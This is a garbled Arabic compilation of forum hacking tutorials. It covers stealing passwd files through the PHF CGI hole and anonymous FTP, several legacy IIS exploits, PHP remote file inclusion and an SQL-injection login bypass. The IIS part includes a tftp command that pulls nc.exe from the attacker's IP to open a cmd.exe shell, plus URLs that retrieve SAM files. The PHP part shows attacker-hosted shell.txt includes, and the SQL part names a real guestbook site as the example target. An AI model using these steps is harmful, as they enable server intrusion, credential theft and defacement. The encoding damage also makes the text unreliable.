‫شكل الكلم واالله مو مرتب ‪ ...‬عشان كذا بعید أكتب لكم بتعمق أكثر والكلم‪ ‬‬ ‫اللي فوق ھذا مجرد مقدمه‪ ‬‬ ‫بكتب بالعامیه ازين لي ولكم‪ ‬‬ ‫مو لزم تعرف الكلم الي سبق ذكرته لكن إفھ م منه جواب السؤال ‪ ::‬كیف يتم‬ ‫‪ ::‬فقط‪ ‬‬ ‫=== نبداء من ھنا وبعمق ===‪ ‬‬ ‫‪ 223‬‬ ‫عرفنا ان الملف‪ ‬‬ ‫(سوف نسمیه من الن بإسم ملف الباسورد )‪ passwd file‬‬ ‫يحتوي على إسماء المستخدمین المرخص لھم الدخول الى السیرفر وكلماتھم‬ ‫السريه وعرفنا أيضا أنھ ا مشفره ولكن ضع كل تفكیره في الحصول على ملف‪ ‬‬ ‫الباسورد وأترك كیفت كسر التشفیر في النھايه فھ ي تعتبر بسیطه‪ ‬‬ ‫فمتو كل اللي راح ‪ ,,,,‬تمام‪ ‬‬ ‫إستغلل الثغرات‪ ‬‬ ‫اول ما ھي الثغرات ‪ ,,,‬الثغرات ھي حفر وھفوات في السفت وير فقط وتمكن‪ ‬‬ ‫أي شخص من الحصول على ماعلمومات أو نشر فیروسات من خلل ھذه‪ ‬‬ ‫الثغره‪ ‬‬ ‫من ضمن ھذه الثغرات ‪ ،‬ثغره سبق وذكرتھا لكم في ھذا المقال وھي في‪ ‬‬ ‫ملفات السي جي آي واستخدمناھا لختراق الموقع‪ ‬‬ ‫‪ www.kondor.com‬‬ ‫ونورد عنھا الن تفاصیل‪ ‬‬ ‫تسمى ھ ذه الثغره المنیه بـ‪ ‬‬ ‫‪ PHF‬‬ ‫ومعظم السیرفرات تمتلك ھذه الثغره والى الن لم يتم رقعھا مع السف (إذا‪ ‬‬ ‫وجد عنده سي جي آي فقط ) !‪ !:‬إذا نجحت ھذه الثغره فسوف يعرض لك ملف‬ ‫الباسورد ‪ ،‬زي ھذا مثل‪ ‬‬ ‫‪ ­ Sources Code‬شفرة‪ ‬‬ ‫‪ root:x:0:1:0000­Admin(0000):/:/bin/ksh‬‬ ‫‪ 0000(:/:(daemon:x:1:1:0000­Admin‬‬ ‫‪ :bin:x:2:2:0000­Admin(0000):/usr/bin‬‬ ‫‪ listen:x:37:4:Network Admin:/usr/net/nls:nobody:x:60001:60001:uid‬‬ ‫‪ :/:nobody:/:noaccess:x:60002:60002:uid noaccess‬‬ ‫‪ 4:101::ftp:x‬‬ ‫‪ :FTPUser:/export/home/ftp‬‬ ‫‪ kondor:yu&rte6745kd:4:RichardClark:/export/home/kondor‬‬ ‫كما ذكرنا سابقن (كتابه سابقً ھكذا سابقن أفضل ) لووول‪ ‬‬ ‫ا‪ ‬‬ ‫أحفظ الملف في تكست او مستند نص عشان تسوي له عملیات لكسر‪ ‬‬ ‫التشفیر‪ ‬‬ ‫‪ 323‬‬ ‫‪ FTP Passwd‬‬ ‫بعض السیرفرات تحفظ ملف الباسورد في الف تي بي نفسه ‪ ،‬أي تستطیع‪ ‬‬ ‫الى حد بعید أن تحصل على ملف الباسورد من خلل دخولك في وصع مخفي‬ ‫‪ anonymous logins‬‬ ‫والدخول بالوضع الخفي شئ قانوني ‪ ،‬وتسحب ملف الباسورد من الھدف‪ ‬‬ ‫المحدد ‪ ،‬غستخدم احد ھذه البرامج لھمل ذلك‪ ‬‬ ‫‪ WS FTP or CuteFTP‬‬ ‫وبعد ماتدخل بالوضع الخفي راح تجیك لسته أو قائمه‪ ‬‬ ‫إختر منھا‪ ‬‬ ‫‪ etc‬‬


‫وراح يعرض لك عدد قلیل من الملفات مثل ھذا‪ ‬‬ ‫‪ ""group, passwd‬‬ ‫وملف الباسورد مو شرط يكون إسمه‪ ‬‬ ‫‪ passwd‬‬ ‫ممكن يكون غیر كذا ‪ ..‬المھ م أنت أسحبه وإفتحه ولو شفت إسم مثل‪ ‬‬ ‫‪ ""root, daemon, FTP, nobody, ftplogin, bin‬‬ ‫وإذا لقیت بالقرب من ھذه الكلمات رمز نجمه كھذه * وقد رمز آخر مثل علمه‬ ‫إكس فقط ‪ ،‬لن ينفعك الستعانه بأحد الكراكر ولكن كل ماعلیك أن تتعقب‪ ‬‬ ‫الباسورد ويجب ان تبحث لحل لھذه المشكله فأنا حتى تحصل على مثل ھذا‬ ‫‪ ""joetest:0IeSH6HfEEIs2:102:100::/home/joetest:/usr/bin/restsh‬‬ ‫والن إستعن بأحد الكراكر لكسر كلمة السر او حاول عن طريق البرامج الذي‪ ‬‬ ‫ذكرتھا لك سابقن‪ ‬‬ ‫س ‪ :‬ماھو إسم المستخد ھنا وماھي كلمة السر المشفره ؟‪ ‬‬ ‫جاوب أنت ‪ !:! ....‬‬ ‫التعقب لملف الباسورد‪ ‬‬ ‫الن وبعد أن حصلت على مثل ھذا‪ ‬‬ ‫‪ ""joetest:*:102:100::/home/joetest:/usr/bin/restsh‬‬ ‫فأنت الن تملك‪ ‬‬ ‫‪ shadowed passwd‬‬ ‫فھذا يتدلى في نظام التشفیل ولكن الـ‪ ‬‬ ‫‪ passwd file‬‬ ‫‪ 423‬‬ ‫يختلف (ل داعي لتعمق اكثر ) والملف‪ ‬‬ ‫‪ passwd file‬‬ ‫ھو الذي نجد كلمة السر فیه مشفره ولیست رمز واحد مثل * أو ‪x‬‬ ‫و الـ‪ ‬‬ ‫‪ shadow file‬‬ ‫يكون مكان كلمة السر نجمه أو رمز‪ ‬‬ ‫وأنا الى الن لست متأكد من ھذه النقطه‪ ‬‬ ‫انا الحین تعبت من الكتابه ‪ ،،‬اتمنى أنكم طلعتو بفايده‪ ‬‬ ‫‪ 523‬‬ ‫الدلیل الكامل لختراق سیرفرات ‪ IIS‬‬ ‫للكاتب‪ X­DeMoN­X:‬‬ ‫­­­­­­­­­‪ ‬‬ ‫مقدمة ‪ - :‬‬ ‫­­­­­­­­­‪ ‬‬ ‫يعلم الجمیع مدى انتشار سیرفرات ‪ IIS‬حیث تشكل النسبة الكبر المستخدمة‬ ‫في تشغیل مواقع النترنت ‪ ..‬‬ ‫ويعلم الجمیع مدى ضعف الناحیة المنیة لھذه السیرفرات ‪ ..‬لذا قررت القیام‪ ‬‬ ‫بجمع اشھر ثغرات ھذا النوع مع توضیح كیفیة عملھا ‪ .‬‬ ‫­­­­­­­­­‪ ‬‬ ‫ملحظة ‪ - :‬‬ ‫­­­­­­­­­‪ ‬‬ ‫معظم الطرق الموجودة ھنا تعمل على سیرفرات ‪0.4 IIS‬و ‪0.5 IIS‬وجمیعھا‪ ‬‬ ‫تعتمد على البورت ‪(( 08‬يعني من خلل المتصفح)) ‪ .‬‬ ‫­­­­­­­­­­­­­‪ ‬‬ ‫المتطلبات ‪ - :‬‬ ‫­­­­­­­­­­­­­‪ ‬‬ ‫‪ CGI­Scanner - 1‬جید ‪ ..‬أنا افضل ‪) Whisker‬يمكنك تنزيله من ھذا الموقع ‪ :‬‬ ‫‪ ( www.wiretrip.net/rfp‬‬


‫‪ - 2‬اكتیف بیرل لتشغیل ملفات البیرل ( يمكنك تنزيله من الموقع ‪ :‬‬ ‫‪ ( /http://www.activestate.com‬‬ ‫‪ - 3‬ويب سیرفر (اي نوع) اباتشي او ‪ .. IIS‬‬ ‫‪ #! # Game Starts‬‬ ‫‪ 623‬‬ ‫­­­­­­­­­­­­­­­­‪ ‬‬ ‫‪ ­ : IIS Hack.exe‬‬ ‫­­­­­­­­­­­­­­­­‪ ‬‬ ‫اكتشف خبراء المن في شركة ‪ eEye‬ثغرة امنیة تسمح لك بتحمیل نسخه‪ ‬‬ ‫ذكیة من ‪ nc.exe‬وجعلھا تنصت على المنفذ ‪ .. 08‬‬ ‫وھذا سیعطیك سطر اوامر ‪ cmde.exe‬مع امتیازات ‪ . Administrator‬‬ ‫بامكانك انزال ‪ NC.exe‬و ‪ IIS Hack.exe‬من الموقع‪ ‬‬ ‫‪ . /http://www.technotronic.com‬‬ ‫ويجب تشغیل ويب سیرفر في جھازك قبل تنفیذ الثغرة ‪ ..‬‬ ‫قم بنسخ اداة ‪ nc.exe‬وضعھا في الدلیل الرئیسي للويب سیرفر لديك (في‪ ‬‬ ‫اباتشي ‪ (Htdocs‬وفي ‪ IIS‬الدلیل ‪ . wwwroot‬‬ ‫ثم قم بتشغیل ‪ : IISHack.exe‬‬ ‫‪ your_IP/ncx.exe 80 /http://www.target.com iishack.exe<\:c‬‬ ‫وبعد اتمام الخطوة السابقة بنجاح ‪ :‬‬ ‫‪ /http://www.target.com nc<\:c‬وستجد امامك ‪ eGG SheLL‬‬ ‫ملحظة ‪ :‬تعمل ھذه الثغرة على سیرفرات ‪0.4 IIS‬فقط ((اذا لم يتم تركیب‪ ‬‬ ‫الرقعه)) ‪ .‬‬ ‫‪ you want me to explain what to do next, hey common you must be do‬‬ ‫‪ kidding‬‬ ‫‪ .......hehe‬‬ ‫­­­­­­­­­­­­­­­­­‪ ‬‬ ‫‪ ­: MDAC = RDS‬‬ ‫­­­­­­­­­­­­­­­­­‪ ‬‬ ‫اعتقد انھ ا ثغرة قديمة قلیل (لكني ما زلت ارى ان ‪ %04‬من المواقع تعاني منھا‬ ‫‪ ..‬‬ ‫تسمح لك ھذه الثغرة بتشغیل اوامرك على النظام الھدف بشكل محلي ‪ ..‬‬ ‫سیتم تشغیل وامرك بصفتك مستخدم ‪ SYSTEM‬اي بصلحیات مدير النظام ‪ ..‬‬ ‫على العموم اذا اردت معرفة اذا ما كان النظام مصابا بھذه الثغرة ام ل ‪ ..‬‬ ‫‪ 723‬‬ ‫قم اول بالتصال بالنظام الھدف ‪ /http://www.host.com nc ­nw ­w 2<\:c :‬‬ ‫‪ 08‬ثم قم بارسال المر ‪ msadc/msadcs.dll HTTP/ GET :‬‬ ‫فإذا كان الرد ‪ application/x_varg :‬فھ ذا يعني ان النظام مصاب (( اذا لم يتم‪ ‬‬ ‫ترقیعه )) ‪ ..‬‬ ‫بامكانك ايجاد سكربتات بیرل تسھل علیك العمل في ھذا الموقع ‪ :‬‬ ‫‪ mdac.pl ­ msadc2.pl v www.wiretrip.net/rfp‬‬ ‫‪ mdac.pl ­h host.com <\:c‬‬ ‫‪assumed):\n Please type the NT commandline you want to run (cmd /c‬‬ ‫‪ cmd /c‬‬ ‫إذا اردت تغییر الصفحه الرئیسیة ما علیك ال تنفیذ المر ‪echo hacked by me :‬‬ ‫‪ C:\inetpub\wwwroot\index.htm < hehe‬‬ ‫وإذا أردنا احكام السیطرة على الموقع بامكاننا تحمیل ‪ Hacker's Swiss knife‬‬ ‫‪ Army‬اقصد ‪ Nc.exe‬بواسطة ھذا المر ‪ :‬‬ ‫‪ %attrib ­r &&ftptmp del&&tftp ­i YourIP GET nc.exe&&%systemroot‬‬ ‫‪ nc.exe ­l ­p 80 ­t ­e cmd.exe&&nc.exe‬‬ ‫(( قم بقراءة المر من الیسار الى الیمین لتتمكن من قراءته جیدا ))‪ ‬‬


‫بعدھا قم بالتصال بالنظام الھدف على المنفذ ‪ 08‬وستجد سطر اوامر مع‪ ‬‬ ‫امتیازات ‪ . Administrator‬‬ ‫‪ ­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­ ­: Showcode.asp & Codebrws.asp‬‬ ‫‪ -------------------------------------‬الملفان عبارة عن قاريء ملفات ‪ ASP‬يأتي‪ ‬‬‫مع ‪ IIS‬ولكنه ل يأتي محمل افتراضیا بل يجب على مدير النظام تفعیله ‪ ..‬‬ ‫فإذا كانت ھذه الخدمة مفعلة ستسفید منھا كثیرا قھي تسمح لك بقراءة اي‪ ‬‬ ‫ملف ‪)) asp.‬اعني رؤية المصدر)) ‪ .‬‬ ‫باستخدام ھ ذا المر ستحصل على ملف السام (( اذا كان النظام مصابا )) ‪ :‬‬ ‫‪ _.http://www.victim.com/msadc/samples...nt/repair/sam‬‬ ‫بعد الحصول على ملف السام ‪ .. Crack it & Expand it‬باستخدام الداة‪ ‬‬ ‫المفضلة لدي ‪0.3) LC‬سیتم كسرھا في اقل من ‪ 42‬ساعه ) ‪ .‬‬ ‫‪ 823‬‬ ‫­­­­­­­­­­­­­­‪ ‬‬ ‫‪ ­ : Null.htw‬‬ ‫­­­­­­­­­­­­‪ ‬‬ ‫عملیة شرح كیفیة عمل ھذه الثغرة معقد قلیل ‪ ..‬لذا سأكتفي فقط بطريقة‪ ‬‬ ‫الستفادة منھا ‪ ..‬‬ ‫باختصار تسمح لك برؤية السورس كود لي ملف ‪ .. ASP‬‬ ‫لتنفیذ الثغرة ‪ http://www.victim.com/null.htw?CiWe...HiliteType=full :‬‬ ‫سیعرض لك ھ ذا الرابط السورس كود الخاص بالصفحه ‪ . Default.asp‬‬ ‫­­­­­­­­­­­­­­­­­­­­­­‪ ‬‬ ‫‪ ­ : htw. & webhits.dll‬‬ ‫­­­­­­­­­­­­­­­­­­­­­­‪ ‬‬ ‫اول قم بتجربة اللنك على النظام الھدف ‪ :‬‬ ‫‪ http://www.victim.com/blabla.htw‬‬ ‫فإذا كان الرد بھذه العبارة ‪ format of the QUERY_STRING is invalid :‬فھذا‬ ‫يعني ان النظام الھدف مصاب بنسبة ‪ . %09‬‬ ‫اخیرا جرب تنفیذ الثغرة بھذه الطريقة ‪ :‬‬ ‫‪ www.victim.com/xxxxxxxxx/xxxxxxxx/x...hilitetype=full‬‬ ‫مع تغییر الـ ‪ XXXXX/XXXXX/XXXX/XXX.htw‬باحد ھذه الملحقات ‪ ,‬وبالتأكید‪ ‬‬ ‫سیعمل احدھا ‪ :‬‬ ‫‪ iissamples/issamples/oop/qfullhit.htw‬‬ ‫‪ iissamples/issamples/oop/qsumrhit.htw‬‬ ‫‪ isssamples/exair/search/qfullhit.htw‬‬ ‫‪ isssamples/exair/search/qsumrhit.htw‬‬ ‫وبالتالي ستحصل على ملف السام قم بكسره بواسطه الداة ‪ 3.. LC‬‬ ‫­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­‪ ‬‬ ‫‪ ]­: Alternate Data Streams [::$DATA ASP‬‬ ‫­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­‪ ‬‬ ‫ھذه الثغرة كانت بدايتھا منذ العام ‪ .. 8991‬وھي مخصصة بالتحديد لسیرفرات‬ ‫‪0.3 IIS‬والن تعمل على بعض سیرفرات ‪ 0.4.. IIS‬‬ ‫‪ 923‬‬ ‫ومھمتھا عرض السورس كود لي صفحه (( البعض يتساءل مالفائدة من عرض‪ ‬‬ ‫سورس الصفحه ؟؟ )) الجابة ان بعض الصفحات تحتوي على معلومات مھمة‪ ‬‬ ‫مثل كلمات مرور قواعد البیانات مثل ‪ Global.asa‬‬ ‫يمكن تنفیذ الثغرة من المتصفح بواسطة ھذا المر‪ ‬‬ ‫‪ DATA$::http://www.victim.com/default.asp‬‬ ‫­­­­­­­­­­­­­­­­­­‪ ‬‬ ‫‪ ­ : dot bug ASP‬‬ ‫­­­­­­­­­­­­­­­­­­‪ ‬‬


‫ربما اقدم ثغرة في ھذا النص ھي ھذه الثغرة حیث تقوم ايضا بعرض السورس‪ ‬‬ ‫كود الخاص بأي صفحه ‪ ..‬حیث تم اكتشافھا في العام ‪ .. 7991‬‬ ‫ويتم تنفیذھا من المتصفح بھذا الشكل ‪ :‬‬ ‫‪ http://www.victim.com/sample.asp .‬لحظ النقطة الموجودة في اخر السطر‬ ‫وھي فقط تعمل على سیرفرات ‪ 0.3. IIS‬‬ ‫­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­‪ ‬‬ ‫‪ < ­ : Truncation ISM.DLL Buffer‬‬ ‫­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­‪ ‬‬ ‫> خطأ برمجي يسمح للمھ اجم بسحب الملفات ورؤوية السورس كود ايضا ‪ ..‬‬ ‫وفكرة الثغرة ھي التحايل على السیرفر بإيھ امه اننا قمنا يطلب ملف ما ‪ ..‬وفي‪ ‬‬ ‫الحقیقة نحن نقوم بطلب ملف اخر ‪ ..‬‬ ‫الملف المسؤوول عن ھذا الخطأ ھو ‪ ISM.dll‬حیث يتم تحمیله بعدد كبیر من‪ ‬‬ ‫الرموز المسافة (‪ . Space ) 02%‬‬ ‫يمكن تنفیذ الثغرة بھذا الشكل ‪ :‬‬ ‫‪ global.asa.htr(230=>...)http://www.victim.com/global.asa‬‬ ‫مكان الـ ‪ >=032‬نقوم بوضع ‪ 032‬مسافة بھذا الشكل ‪ .. %02‬‬ ‫ھذا الخطأ يعمل على سیرفرات ‪ .. 5.0&IIS 0.4‬ولكن ل يمكن تجربتھا على‪ ‬‬ ‫السیرفر اكثر من مره ال اذا قام بتسجیل خروج وتسجیل دخول ‪ ,‬ويعود السبب‪ ‬‬ ‫في ذلك ان الثغرة السابقة تؤدي الى ايقاف الملف ‪ ISM.dll‬عن العمل في‪ ‬‬ ‫الذاكرة بینما تطلب الثغرة ان يكون الملف المذكور قید العمل ‪ ..‬لذا يجب اعادة‪ ‬‬ ‫تحمیل الملف في الذاكرة مره اخرى ‪ ..‬اي بمعنى اخر يجب ان يقوم مدير‪ ‬‬ ‫النظام الھدف بعمل اعادة تشغیل ‪ Rebot‬او ‪ . Login & Logout‬‬ ‫‪ 033‬‬ ‫­­­­­­­­­­‪ ‬‬ ‫‪ +.­: htr‬‬ ‫­­­­­­­­­‪ ‬‬ ‫ھذه الثغرة ايضا تقوم بعرض السورس الخاص بملفات ‪ . ASP‬‬ ‫يمكن استخدامھا بھذا الشكل ‪ :‬‬ ‫‪ http://www.victim.com/global.asa+.htr‬‬ ‫­­­­­­­­­­­­­‪ ‬‬ ‫‪ ­ : site.csc‬‬ ‫­­­­­­­­­­­­‪ ‬‬ ‫تمكنك ھذه الثغرة من معرفة معلومات مھمة عن الـ ‪ DNS‬الخاص بالموقع بما‪ ‬‬ ‫في ذلك ‪ .. DSN, UID and PASS Database‬‬ ‫الثغرة ‪ http://www.victim.com/adsamples/config/site.csc :‬‬ ‫سیقوم المھ اجم بانزال الملف المذكور ‪ ..‬وسیحصل على معلومات قیمة و ھامة‬ ‫أيضا ‪ .‬‬ ‫‪ 133‬‬ ‫شرح لثغرات ال ‪ php‬المشھوره مع نموذج عملي‪ ‬‬ ‫للكاتب‪ fady911x:‬‬ ‫اھ ل بیكم في اول مواضیع امن الشبكات في منتدي القھوه‪ ‬‬ ‫و اتمني ان الموضوع يعجبكم و يفیدكم‪ ‬‬ ‫سوف اقوم الیوم بشرح بعض ثغرات ال‪ ‬‬ ‫‪ php‬‬ ‫المنتشره مع نموذج عملي‪ ‬‬ ‫لكن قبل ان ابدا الشرح احب ان اوضح اني ل احب ان اعطي المعلومه بالملعقه‬ ‫فاذا‪ ‬‬ ‫احبب ان تصبح ھ اكر حقیقي يجب ان تبدا بالبحث بنفسك عن المعلومه و ان‪ ‬‬ ‫تقوم‪ ‬‬ ‫بتطوير نفسك و تعلم البرمجه و انظمه التشغیل المختلفه‪ ‬‬


‫حتي تفھم ھ ذا الشرح يجب ان تكون عندك معرفه بسیطه بلغه برمجه ال‪ ‬‬ ‫‪ php‬‬ ‫و انظمه التشغیل المبنیه علي الیونكس مثل اللینكس وال‪ ‬‬ ‫‪ free bsd‬‬ ‫‪ open bsd‬‬ ‫‪ ....‬‬ ‫و الن لنبدا الشرح‪ ‬‬ ‫اغلب ثغرات ال‪ ‬‬ ‫‪ php‬‬ ‫مبنیه علي اخطاء المبرمج‪ ‬‬ ‫و ايضا اخطاء مدير السیرفر‪ ‬‬ ‫و سنستعرض نماذج لكل منھم‪ ‬‬ ‫و لنبدا باخطاء مدير السیرفر لنھا السھل في الشرح‪ ‬‬ ‫‪ 233‬‬ ‫تنحصر اغلب اخطاء مدير السیرفر بان يقوم بتشغیل ال‪ ‬‬ ‫‪ php‬‬ ‫بنفس ال‪ ‬‬ ‫‪ id‬‬ ‫الخاص بال‪ ‬‬ ‫‪ apache‬‬ ‫و الذي غالبا ما يكون‪ ‬‬ ‫‪ 99‬‬ ‫و اسم المستخدم‪ ‬‬ ‫‪ nobody‬‬ ‫و ھذا المستخدم له كل صلحیات ال‪ ‬‬ ‫‪ arache web server‬‬ ‫فله الحق في قراءه كل ملفات المواقع الخري‪ ‬‬ ‫و في بعض الحیان تعديل بعض الملفات المسموح له من قبل المستخدمین‬ ‫الخرين بتعديلھا‪ ‬‬ ‫سؤال بديھي للغايه‪ ‬‬ ‫كیف نقوم بالتحكم في ھذا المستخدم؟؟‪ ‬‬ ‫ببساطه يمكنك ھ ذا بناءا علي خطا اخر يقوم به میدر السیرفر بالضافه الي‬ ‫الخطا الول‪ ‬‬ ‫و ھو عدم تشغیل ال‪ ‬‬ ‫‪ php‬‬ ‫في وضعیه ال‪ ‬‬ ‫‪ safe mode‬‬ ‫ملحوظه يمكنك تعديل خصائص ال‪ ‬‬ ‫‪ php‬‬ ‫من ملف‪ ‬‬ ‫‪ php.conf‬‬ ‫فبالتالي نصبح قادرين علي استخدام اوامر مثل‪ ‬‬ ‫‪ )(system‬‬ ‫‪ )(exec‬‬ ‫و ھذا يقوم باعطاءك ما يطلق علیه‪ ‬‬ ‫‪ 333‬‬ ‫‪ php shell‬‬ ‫الذي عن طريقھ ا تستطیع ان تقوم باصدار الوامر التي تجعلك قادرا مشاھده‬ ‫ملفات المواقع الخري و احیانا‪ ‬‬ ‫الكتابه فیھ ا لكن ذلك يكون ناتجا عن غباء المستخدم‪ ‬‬


‫ملحوظه ھ ذا ل يعتبر في حد ذاته خطا اذا كان ال‪ ‬‬ ‫‪ php‬‬ ‫يعمل ب‪ ‬‬ ‫‪ id‬‬ ‫المستخدم‪ ‬‬ ‫و لیس الخاص بال‪ ‬‬ ‫‪ apache‬‬ ‫و لكن في تلك الحاله سیصبح الخطر ممیت بالنسبه للسمتخدم و ضعیف‪ ‬‬ ‫للغايه بالنسبه‪ ‬‬ ‫لمدير السیرفر‪ ‬‬ ‫من الخطاء الخري الشائعه جدا ال و ھي ال‪ ‬‬ ‫‪ global variables‬‬ ‫التي تسمح مثل ان تجعل التي ممكنا‪ ‬‬ ‫‪ :PHP‬‬ ‫‪ ;"$var="h++p://attacker/script.txt‬‬ ‫و تلك يجب اغلقھا من ملف‪ ‬‬ ‫‪ php.conf‬‬ ‫‪ "global variables ="off‬‬ ‫و سنعرف فائدتھ ا في قسم اخطاء المبرمجین‪ ‬‬ ‫من اكبر اخطاء المبرمجین اعتقاده ان الكود الذي كتبه كامل ول يوجد به خطا‬ ‫واحد و سوف يعمل كما توقع ھو‪ ‬‬ ‫‪ 433‬‬ ‫و كمثال بسیط لو افتراضا ان ھناك ملف‪ ‬‬ ‫‪ script.php‬‬ ‫الكود الخاص به كالتي‪ ‬‬ ‫‪ :PHP‬‬ ‫<?‪ ‬‬ ‫­­­­­­­­­­­‪ ‬‬ ‫‪ ;)include ($file‬‬ ‫­­­­­­­­­­­‪ ‬‬ ‫?>‪ ‬‬ ‫كما تلحظون فان المبرمج ترك المتغیر‪ ‬‬ ‫‪ $file‬‬ ‫غیر معرف و لیه له قیمه محدده‪ ‬‬ ‫لذلك يمكنك فعل التي‪ ‬‬ ‫‪h++p://host/script.php?file=h++p://attacker/shell.txt‬‬ ‫الذي حدث ھنا اننا جعلنا ال‪ ‬‬ ‫‪ script.php‬‬ ‫تقوم بتشغیل الكود الموجود بداخل موقعنا‪ ‬‬ ‫‪ h++p://attacker/shell.txt‬‬ ‫و الذي من الممكن ان نضع به شیئا شبیھا بھذا‪ ‬‬ ‫‪ :PHP‬‬ ‫‪ 533‬‬ ‫<?‪ ‬‬ ‫‪ ;)system($x‬‬ ‫?>‪ ‬‬ ‫و بالتالي‪ ‬‬ ‫‪h++p://host/script.php?file=h++p://attacker/shell.txt&x=ls ­al‬‬ ‫سوف يقوم باستعراض كل الملفات الموجوده بالموقع‪ ‬‬ ‫لحظوا معي التي‪ ‬‬


‫ھذا ل يمكن فعله ال في حاله‪ ‬‬ ‫‪ safe mode = on‬‬ ‫‪ global variables = on‬‬ ‫يمكنك ان تضع اي كود اخر في‪ ‬‬ ‫‪ shell.txt‬‬ ‫خصوصا في حاله اذا كان السیف مود يعمل‪ ‬‬ ‫مثل‪ ‬‬ ‫‪ :PHP‬‬ ‫‪ ;)(phpinfo‬‬ ‫‪ 633‬‬ ‫سوف تقوم باستعراض كل المعلومات الخاصه بالسیرفر‪ ‬‬ ‫لحظ ھنا ان‪ ‬‬ ‫‪ :PHP‬‬ ‫‪ ;"$file="h++p://attacker/shell.txt‬‬ ‫و ھ ذا ناتج عن الجلوبال فاريابلز التي تحدثت عنھا مسبقا‪ ‬‬ ‫و كما تري ھنا فان فائدتھا واضحه جدا‪ ‬‬ ‫فاذا كنت مدير لسیرفر ما يجب ان تقوم باغلق تلك الخاصیه‬ ‫و الن وقت النموذج العملي‪ ‬‬ ‫سوف اقوم الن بشرح ثغره جمیله قام باكتشافھا‪ ‬‬ ‫‪ frog man‬‬ ‫و تلك الثغره موجوده بمنتديات‪ ‬‬ ‫‪ D­forum‬‬ ‫ھذه الثغره موجوده في ملفي‪ ‬‬ ‫‪ header.php‬‬ ‫‪ footer.php‬‬ ‫‪ header.php‬‬ ‫‪ :PHP‬‬ ‫‪ 733‬‬ ‫?<‪ ‬‬ ‫­­­­­­­­­­­­­‪ ‬‬ ‫)""=!‪ if ($my_header ‬‬ ‫{‪ ‬‬ ‫;)‪ include($my_header‬‬ ‫}‪ ‬‬ ‫­­­­­­­­­­­­­‪ ‬‬ ‫>?‪ ‬‬ ‫‪ footer.php‬‬ ‫‪ PHP:‬‬ ‫?<‪ ‬‬ ‫­­­­­­­­­­­­­‪ ‬‬ ‫)""=!‪ if ($my_footer ‬‬ ‫{‪ ‬‬ ‫;)‪ include($my_footer‬‬ ‫‪338‬‬ ‫}‪ ‬‬ ‫­­­­­­­­­­­­­‪ ‬‬ ‫>?‪ ‬‬ ‫و طبعا فان طريقه تشغیل كل من الثغرتان واضح وبسیط جدا‪ ‬‬ ‫‪ header.php‬‬ ‫‪h++p://host/includes/header.php?my_header=h++p://attacker/script.‬‬


‫‪ txt‬‬ ‫و نفس الشيء ل‪ ‬‬ ‫‪ footer.php‬‬ ‫‪h++p://host/includes/footer.php?my_footer=h++p://attacker/script.tx‬‬ ‫‪ t‬‬ ‫اتمني ان يكون شرحي افادكم و اعجبكم‪ ‬‬ ‫تحیاتي‪ ‬‬ ‫‪ 339‬‬ ‫للجمیعشرح ثغرة سجل الزوار‬ ‫للكاتب‪ MeSa7eB :‬‬ ‫السلم علیكم ورحمة االله وبركاته‪ ‬‬ ‫الیوم بشرح لكم ثغرة سجل الزوار‪ aspjar guestbook ..‬‬ ‫ثغرة جديدة ‪ +‬سھله جدا‪ ..‬‬ ‫ھي من نوع‪ sql injection ..‬‬ ‫الشرح ‪ :‬‬ ‫اذھب الى قوقل وضع ھ ذي الكلمة في محرك البحث ‪ :‬‬ ‫كود‪ PHP:‬‬ ‫‪ aspjar guestbook‬‬ ‫بتطلع لك مواثع كثیرة ناخذ ھذا مثال ‪ :‬‬ ‫‪http://www.timberman.com/Guestbook/guest.asp‬‬ ‫قم بمسح كلمة ‪ :‬‬ ‫كود‪ PHP:‬‬ ‫‪ guest.asp‬‬ ‫واستبدلھا بـ ‪ :‬‬ ‫‪ 043‬‬ ‫كود‪ PHP:‬‬ ‫‪ admin/login.asp‬‬ ‫الن قم بادخال اسم المستخدم والباسورد وھما ‪ :‬‬ ‫اسم المستخدم ‪ :‬‬ ‫‪ )(nothing‬‬ ‫الباسورد ‪ :‬‬ ‫‪ ' or 'x'='x‬‬ ‫الن اضغط ‪ Log in‬‬ ‫راح تلقى ھالكلم ومعناه تم تسجیل دخولك بنجاح ‪:‬‬ ‫‪ 143‬‬ ‫‪ Login Page‬‬ ‫!‪ You are Logged in‬‬ ‫‪Choose from the menu at the top to maintain the site‬‬ ‫الن قم بمسح كلمة‪ : ‬‬ ‫‪ login.asp?Mode=login‬‬ ‫لیكون الرابط ھكذا‪ : ‬‬ ‫‪ http://www.timberman.com/Guestbook/admin/‬‬ ‫الن سترى لوحة التحكم‪ ..‬‬ ‫‪ 342‬‬ ‫اختراق الديجي شات احدث الطرق لتخطى الحماية‪343 ‬‬ ‫للكاتب‪ Super­CrystaL :‬‬ ‫درسنا الیوم جديد من نوعه وھو تكملة للدرسین التى فاتت عن اختراق‪ ‬‬ ‫الديجي شات قبل كم سنوات‪ ‬‬ ‫درسنا عباره عن اختراق الديجي شات ولكن لم اطرح الدرس ال بعد ماقمت‪ ‬‬ ‫بعمل مضاد لكل ماسأشرحه‪ ‬‬


‫ھنا‪ ‬‬ ‫ولكن لتسويق عملنا شرحنا اختراق الديجي شات وتخطى الحماية التعبانه‪ ‬‬ ‫بالمواقع‪ ‬‬ ‫اذن سنبدأ بالدرس والبتعاد عن المقدمات وكلم طويل عريض‪ ‬‬ ‫ولكن لدي شرط عزيزي القارئ واتمنى ان تحترم كاتب الموضوع ولتتغاضى عن‬ ‫شروطي‪ ‬‬ ‫وھذا من حقي‪ ‬‬ ‫اتمنى حفظ حقوق الكاتب وليتم سرقة فأنا لحظت كل مااكتب شرح بالخص‪ ‬‬ ‫عن الديجي شات‪ ‬‬ ‫يتم سرقه وعرض بعدة مواقع وبكتب ولم يذكر اي مصدر لكل ماتعبت علیه‪ ‬‬ ‫وكتبته‪ ‬‬ ‫فھ ذا الدرس طرح بمنتدى العاصفة وتم التوقیع علیه والحقوق تحفظ لي او‪ ‬‬ ‫لمنتدى العاصفة اھم شئ تحفظ‪ ‬‬ ‫وليضیع حق ورائه مطالب‪ ‬‬ ‫‪ 443‬‬ ‫‪::::::‬الكـــاتــب) ‪ Super­CrystaL‬ابوروان‪ ( :::::::::::::‬‬ ‫لن اعید 